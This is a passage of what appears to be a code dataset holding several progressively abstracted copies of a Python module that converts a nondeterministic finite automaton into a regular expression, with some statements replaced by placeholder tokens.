set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join([i.label for i in self.\n _terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, \n input or 'lambda', ','.join([i.label for i in self.\n _deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n return ret\n\n\ndef nfa2regex(nfa):\n if not nfa.isValid():\n raise AutomataError(\n 'NFA must be in a valid state to be converted to a regex.')\n network = NetworkNFA(nfa)\n if DEBUG:\n print('START', network)\n start = Node('qs')\n network.addNode(start)\n network.addDelta(start, '', network.start)\n network.start = start\n end = Node('qf')\n network.addNode(end)\n for i in network.terminals:\n 
network.addDelta(i, '', end)\n network.remTerminal(i)\n network.addTerminal(end)\n if DEBUG:\n print('Dummies added: ', network)\n for src in network.nodes:\n delta_temp = network.getDelta(src)\n for dest in network.nodes:\n chars = []\n for input in delta_temp:\n if input and dest in delta_temp[input]:\n chars.append(input)\n if len(chars):\n for c in chars:\n delta_temp[c].remove(dest)\n if len(delta_temp[c]) == 0:\n del delta_temp[c]\n if len(chars) > 1:\n chars = '(' + '+'.join(chars) + ')'\n else:\n chars = '+'.join(chars)\n network.addDelta(src, chars, dest)\n if DEBUG:\n print('Collapsed: ', network)\n pliableNodes = list(network.nodes)\n pliableNodes.remove(network.start)\n for n in network.terminals:\n pliableNodes.remove(n)\n nodeFinalDist = {}\n maxDist = len(network.nodes) ** len(network.nodes)\n for n in network.nodes:\n nodeFinalDist[n] = maxDist\n nodeFinalDist[network.terminals[0]] = 0\n toProcess = list(network.nodes)\n toProcess.remove(network.terminals[0])\n while len(toProcess):\n for node in toProcess:\n dests = network.getDelta(node).values()\n if len(dests) == 0:\n dests = set([])\n else:\n dests = reduce(set.union, network.getDelta(node).values())\n if len(dests) == 0:\n toProcess.remove(node)\n else:\n minDist = min([nodeFinalDist[i] for i in dests])\n if minDist != maxDist:\n nodeFinalDist[node] = minDist + 1\n toProcess.remove(node)\n pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)\n if DEBUG:\n print('Pliables: ', pliableNodes)\n for node in pliableNodes:\n network.remNode(node)\n delta = copy(network.getDelta(node))\n loops = []\n for input in delta:\n if node in delta[input]:\n if len(input):\n loops.append(input)\n loopRegex = '+'.join(loops)\n if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1\n ] == ')'):\n loopRegex = '(' + loopRegex + ')*'\n elif len(loopRegex) >= 1:\n loopRegex = loopRegex + '*'\n for input in copy(delta):\n if delta[input] == set([node]):\n del delta[input]\n elif node in delta[input]:\n delta[input].remove(node)\n if '' in delta and (len(delta) != 1 or len(delta['']) != 1):\n eligible = []\n for dest in delta['']:\n delta_temp = network.getDelta(dest)\n if '' in delta_temp and node in delta_temp['']:\n eligible.append(dest)\n if len(eligible):\n replaceNode(network, node, eligible[0])\n continue\n try:\n del network._deltas[node]\n except KeyError:\n continue\n if DEBUG:\n print('Working on connections: ', node, delta)\n deltas_temp = copyDeltas(network._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n tempDeltaDest = network.getDelta(src)[input]\n if node in tempDeltaDest:\n tempDeltaDest.remove(node)\n if len(tempDeltaDest) == 0:\n network.remDelta(src, input)\n for input2 in delta:\n for dest in delta[input2]:\n if not (src == dest and input + loopRegex +\n input2 == ''):\n network.addDelta(src, input + loopRegex +\n input2, dest)\n if DEBUG:\n print('New Delta:', src, input,\n loopRegex, input2, dest, network)\n branches = network.getDelta(network.start).keys()\n if len(branches) == 1:\n regex = branches[0]\n else:\n prefix = commonprefix(branches)\n suffix = commonsuffix(branches)\n branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(\n prefix):]) for i in branches]\n branches.sort(key=len)\n if len(prefix) or len(suffix):\n regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]\n ) + ')' + suffix\n else:\n regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI\n return regex\n", "<import token>\nDEBUG = False\nLAMBDA = u'λ'\nPHI = u'Ø'\n\n\ndef 
copyDeltas(src):\n out = dict()\n for k in src:\n out[k] = dict()\n for k2 in src[k]:\n out[k][k2] = copy(src[k][k2])\n return out\n\n\ndef replaceNode(nfa, old, new):\n if DEBUG:\n print('R_Start(%s, %s) ---' % (old, new), nfa)\n if old in nfa._deltas:\n for input in nfa._deltas[old]:\n nfa.addDelta(new, input, nfa._deltas[old][input])\n del nfa._deltas[old]\n if DEBUG:\n print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)\n deltas_temp = copyDeltas(nfa._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n if old in deltas_temp[src][input]:\n nfa._deltas[src][input].remove(old)\n nfa._deltas[src][input].add(new)\n if DEBUG:\n print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)\n\n\ndef commonsuffix(seq):\n\n def reverse(s):\n out = ''\n for c in reversed(s):\n out += c\n return out\n seq = [reverse(i) for i in seq]\n return reverse(commonprefix(seq))\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' 
% input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join([i.label for i in self.\n _terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, \n input or 'lambda', ','.join([i.label for i in self.\n _deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n return ret\n\n\ndef nfa2regex(nfa):\n if not nfa.isValid():\n raise AutomataError(\n 'NFA must be in a valid state to be converted to a regex.')\n network = NetworkNFA(nfa)\n if DEBUG:\n print('START', network)\n start = Node('qs')\n network.addNode(start)\n network.addDelta(start, '', network.start)\n network.start = start\n end = Node('qf')\n network.addNode(end)\n for i in network.terminals:\n network.addDelta(i, '', end)\n network.remTerminal(i)\n network.addTerminal(end)\n if DEBUG:\n print('Dummies added: ', network)\n for src in network.nodes:\n delta_temp = network.getDelta(src)\n for dest in network.nodes:\n chars = []\n for input in delta_temp:\n if input and dest in delta_temp[input]:\n chars.append(input)\n if len(chars):\n for c in chars:\n delta_temp[c].remove(dest)\n if len(delta_temp[c]) == 0:\n del delta_temp[c]\n if len(chars) > 1:\n chars = '(' + '+'.join(chars) + ')'\n else:\n chars = '+'.join(chars)\n network.addDelta(src, chars, dest)\n if DEBUG:\n print('Collapsed: ', network)\n pliableNodes = list(network.nodes)\n pliableNodes.remove(network.start)\n for n in network.terminals:\n pliableNodes.remove(n)\n nodeFinalDist = {}\n maxDist = len(network.nodes) ** len(network.nodes)\n for n in network.nodes:\n nodeFinalDist[n] = maxDist\n nodeFinalDist[network.terminals[0]] = 0\n toProcess = list(network.nodes)\n toProcess.remove(network.terminals[0])\n while len(toProcess):\n for node in toProcess:\n dests = network.getDelta(node).values()\n if len(dests) == 0:\n dests = set([])\n else:\n dests = reduce(set.union, network.getDelta(node).values())\n if len(dests) == 0:\n toProcess.remove(node)\n else:\n minDist = min([nodeFinalDist[i] for i in dests])\n if minDist != maxDist:\n nodeFinalDist[node] = minDist + 1\n toProcess.remove(node)\n pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)\n if DEBUG:\n print('Pliables: ', pliableNodes)\n for node in pliableNodes:\n network.remNode(node)\n delta = copy(network.getDelta(node))\n loops = []\n for input in delta:\n if node in delta[input]:\n 
if len(input):\n loops.append(input)\n loopRegex = '+'.join(loops)\n if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1\n ] == ')'):\n loopRegex = '(' + loopRegex + ')*'\n elif len(loopRegex) >= 1:\n loopRegex = loopRegex + '*'\n for input in copy(delta):\n if delta[input] == set([node]):\n del delta[input]\n elif node in delta[input]:\n delta[input].remove(node)\n if '' in delta and (len(delta) != 1 or len(delta['']) != 1):\n eligible = []\n for dest in delta['']:\n delta_temp = network.getDelta(dest)\n if '' in delta_temp and node in delta_temp['']:\n eligible.append(dest)\n if len(eligible):\n replaceNode(network, node, eligible[0])\n continue\n try:\n del network._deltas[node]\n except KeyError:\n continue\n if DEBUG:\n print('Working on connections: ', node, delta)\n deltas_temp = copyDeltas(network._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n tempDeltaDest = network.getDelta(src)[input]\n if node in tempDeltaDest:\n tempDeltaDest.remove(node)\n if len(tempDeltaDest) == 0:\n network.remDelta(src, input)\n for input2 in delta:\n for dest in delta[input2]:\n if not (src == dest and input + loopRegex +\n input2 == ''):\n network.addDelta(src, input + loopRegex +\n input2, dest)\n if DEBUG:\n print('New Delta:', src, input,\n loopRegex, input2, dest, network)\n branches = network.getDelta(network.start).keys()\n if len(branches) == 1:\n regex = branches[0]\n else:\n prefix = commonprefix(branches)\n suffix = commonsuffix(branches)\n branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(\n prefix):]) for i in branches]\n branches.sort(key=len)\n if len(prefix) or len(suffix):\n regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]\n ) + ')' + suffix\n else:\n regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI\n return regex\n", "<import token>\n<assignment token>\n\n\ndef copyDeltas(src):\n out = dict()\n for k in src:\n out[k] = dict()\n for k2 in src[k]:\n out[k][k2] = copy(src[k][k2])\n return out\n\n\ndef replaceNode(nfa, old, new):\n if DEBUG:\n print('R_Start(%s, %s) ---' % (old, new), nfa)\n if old in nfa._deltas:\n for input in nfa._deltas[old]:\n nfa.addDelta(new, input, nfa._deltas[old][input])\n del nfa._deltas[old]\n if DEBUG:\n print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)\n deltas_temp = copyDeltas(nfa._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n if old in deltas_temp[src][input]:\n nfa._deltas[src][input].remove(old)\n nfa._deltas[src][input].add(new)\n if DEBUG:\n print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)\n\n\ndef commonsuffix(seq):\n\n def reverse(s):\n out = ''\n for c in reversed(s):\n out += c\n return out\n seq = [reverse(i) for i in seq]\n return reverse(commonprefix(seq))\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' 
% input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join([i.label for i in self.\n _terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, \n input or 'lambda', ','.join([i.label for i in self.\n _deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n return ret\n\n\ndef nfa2regex(nfa):\n if not nfa.isValid():\n raise AutomataError(\n 'NFA must be in a valid state to be converted to a regex.')\n network = NetworkNFA(nfa)\n if DEBUG:\n print('START', network)\n start = Node('qs')\n network.addNode(start)\n network.addDelta(start, '', network.start)\n network.start = start\n end = Node('qf')\n network.addNode(end)\n for i in network.terminals:\n network.addDelta(i, '', end)\n network.remTerminal(i)\n network.addTerminal(end)\n if DEBUG:\n print('Dummies added: ', network)\n for src in network.nodes:\n delta_temp = network.getDelta(src)\n for dest in network.nodes:\n chars = []\n for input in delta_temp:\n if input and dest in delta_temp[input]:\n chars.append(input)\n if len(chars):\n for c in chars:\n delta_temp[c].remove(dest)\n if len(delta_temp[c]) == 0:\n del delta_temp[c]\n if len(chars) > 1:\n chars = '(' + '+'.join(chars) + ')'\n else:\n chars = '+'.join(chars)\n network.addDelta(src, chars, dest)\n if DEBUG:\n print('Collapsed: ', network)\n pliableNodes = list(network.nodes)\n pliableNodes.remove(network.start)\n for n in network.terminals:\n 
pliableNodes.remove(n)\n nodeFinalDist = {}\n maxDist = len(network.nodes) ** len(network.nodes)\n for n in network.nodes:\n nodeFinalDist[n] = maxDist\n nodeFinalDist[network.terminals[0]] = 0\n toProcess = list(network.nodes)\n toProcess.remove(network.terminals[0])\n while len(toProcess):\n for node in toProcess:\n dests = network.getDelta(node).values()\n if len(dests) == 0:\n dests = set([])\n else:\n dests = reduce(set.union, network.getDelta(node).values())\n if len(dests) == 0:\n toProcess.remove(node)\n else:\n minDist = min([nodeFinalDist[i] for i in dests])\n if minDist != maxDist:\n nodeFinalDist[node] = minDist + 1\n toProcess.remove(node)\n pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)\n if DEBUG:\n print('Pliables: ', pliableNodes)\n for node in pliableNodes:\n network.remNode(node)\n delta = copy(network.getDelta(node))\n loops = []\n for input in delta:\n if node in delta[input]:\n if len(input):\n loops.append(input)\n loopRegex = '+'.join(loops)\n if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1\n ] == ')'):\n loopRegex = '(' + loopRegex + ')*'\n elif len(loopRegex) >= 1:\n loopRegex = loopRegex + '*'\n for input in copy(delta):\n if delta[input] == set([node]):\n del delta[input]\n elif node in delta[input]:\n delta[input].remove(node)\n if '' in delta and (len(delta) != 1 or len(delta['']) != 1):\n eligible = []\n for dest in delta['']:\n delta_temp = network.getDelta(dest)\n if '' in delta_temp and node in delta_temp['']:\n eligible.append(dest)\n if len(eligible):\n replaceNode(network, node, eligible[0])\n continue\n try:\n del network._deltas[node]\n except KeyError:\n continue\n if DEBUG:\n print('Working on connections: ', node, delta)\n deltas_temp = copyDeltas(network._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n tempDeltaDest = network.getDelta(src)[input]\n if node in tempDeltaDest:\n tempDeltaDest.remove(node)\n if len(tempDeltaDest) == 0:\n network.remDelta(src, input)\n for input2 in delta:\n for dest in delta[input2]:\n if not (src == dest and input + loopRegex +\n input2 == ''):\n network.addDelta(src, input + loopRegex +\n input2, dest)\n if DEBUG:\n print('New Delta:', src, input,\n loopRegex, input2, dest, network)\n branches = network.getDelta(network.start).keys()\n if len(branches) == 1:\n regex = branches[0]\n else:\n prefix = commonprefix(branches)\n suffix = commonsuffix(branches)\n branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(\n prefix):]) for i in branches]\n branches.sort(key=len)\n if len(prefix) or len(suffix):\n regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]\n ) + ')' + suffix\n else:\n regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI\n return regex\n", "<import token>\n<assignment token>\n\n\ndef copyDeltas(src):\n out = dict()\n for k in src:\n out[k] = dict()\n for k2 in src[k]:\n out[k][k2] = copy(src[k][k2])\n return out\n\n\ndef replaceNode(nfa, old, new):\n if DEBUG:\n print('R_Start(%s, %s) ---' % (old, new), nfa)\n if old in nfa._deltas:\n for input in nfa._deltas[old]:\n nfa.addDelta(new, input, nfa._deltas[old][input])\n del nfa._deltas[old]\n if DEBUG:\n print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)\n deltas_temp = copyDeltas(nfa._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n if old in deltas_temp[src][input]:\n nfa._deltas[src][input].remove(old)\n nfa._deltas[src][input].add(new)\n if DEBUG:\n print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)\n\n\n<function token>\n\n\nclass 
NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join([i.label for i in self.\n _terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, \n input or 'lambda', ','.join([i.label for i in self.\n _deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n return ret\n\n\ndef nfa2regex(nfa):\n if not nfa.isValid():\n raise AutomataError(\n 'NFA must be in a valid state to be converted to a regex.')\n network = NetworkNFA(nfa)\n if DEBUG:\n print('START', network)\n start = Node('qs')\n network.addNode(start)\n network.addDelta(start, '', network.start)\n network.start = start\n end = Node('qf')\n network.addNode(end)\n for i in network.terminals:\n network.addDelta(i, '', end)\n network.remTerminal(i)\n network.addTerminal(end)\n if DEBUG:\n print('Dummies added: ', network)\n for 
src in network.nodes:\n delta_temp = network.getDelta(src)\n for dest in network.nodes:\n chars = []\n for input in delta_temp:\n if input and dest in delta_temp[input]:\n chars.append(input)\n if len(chars):\n for c in chars:\n delta_temp[c].remove(dest)\n if len(delta_temp[c]) == 0:\n del delta_temp[c]\n if len(chars) > 1:\n chars = '(' + '+'.join(chars) + ')'\n else:\n chars = '+'.join(chars)\n network.addDelta(src, chars, dest)\n if DEBUG:\n print('Collapsed: ', network)\n pliableNodes = list(network.nodes)\n pliableNodes.remove(network.start)\n for n in network.terminals:\n pliableNodes.remove(n)\n nodeFinalDist = {}\n maxDist = len(network.nodes) ** len(network.nodes)\n for n in network.nodes:\n nodeFinalDist[n] = maxDist\n nodeFinalDist[network.terminals[0]] = 0\n toProcess = list(network.nodes)\n toProcess.remove(network.terminals[0])\n while len(toProcess):\n for node in toProcess:\n dests = network.getDelta(node).values()\n if len(dests) == 0:\n dests = set([])\n else:\n dests = reduce(set.union, network.getDelta(node).values())\n if len(dests) == 0:\n toProcess.remove(node)\n else:\n minDist = min([nodeFinalDist[i] for i in dests])\n if minDist != maxDist:\n nodeFinalDist[node] = minDist + 1\n toProcess.remove(node)\n pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)\n if DEBUG:\n print('Pliables: ', pliableNodes)\n for node in pliableNodes:\n network.remNode(node)\n delta = copy(network.getDelta(node))\n loops = []\n for input in delta:\n if node in delta[input]:\n if len(input):\n loops.append(input)\n loopRegex = '+'.join(loops)\n if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1\n ] == ')'):\n loopRegex = '(' + loopRegex + ')*'\n elif len(loopRegex) >= 1:\n loopRegex = loopRegex + '*'\n for input in copy(delta):\n if delta[input] == set([node]):\n del delta[input]\n elif node in delta[input]:\n delta[input].remove(node)\n if '' in delta and (len(delta) != 1 or len(delta['']) != 1):\n eligible = []\n for dest in delta['']:\n delta_temp = network.getDelta(dest)\n if '' in delta_temp and node in delta_temp['']:\n eligible.append(dest)\n if len(eligible):\n replaceNode(network, node, eligible[0])\n continue\n try:\n del network._deltas[node]\n except KeyError:\n continue\n if DEBUG:\n print('Working on connections: ', node, delta)\n deltas_temp = copyDeltas(network._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n tempDeltaDest = network.getDelta(src)[input]\n if node in tempDeltaDest:\n tempDeltaDest.remove(node)\n if len(tempDeltaDest) == 0:\n network.remDelta(src, input)\n for input2 in delta:\n for dest in delta[input2]:\n if not (src == dest and input + loopRegex +\n input2 == ''):\n network.addDelta(src, input + loopRegex +\n input2, dest)\n if DEBUG:\n print('New Delta:', src, input,\n loopRegex, input2, dest, network)\n branches = network.getDelta(network.start).keys()\n if len(branches) == 1:\n regex = branches[0]\n else:\n prefix = commonprefix(branches)\n suffix = commonsuffix(branches)\n branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(\n prefix):]) for i in branches]\n branches.sort(key=len)\n if len(prefix) or len(suffix):\n regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]\n ) + ')' + suffix\n else:\n regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI\n return regex\n", "<import token>\n<assignment token>\n\n\ndef copyDeltas(src):\n out = dict()\n for k in src:\n out[k] = dict()\n for k2 in src[k]:\n out[k][k2] = copy(src[k][k2])\n return out\n\n\n<function 
token>\n<function token>\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join([i.label for i in self.\n _terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, \n input or 'lambda', ','.join([i.label for i in self.\n _deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n 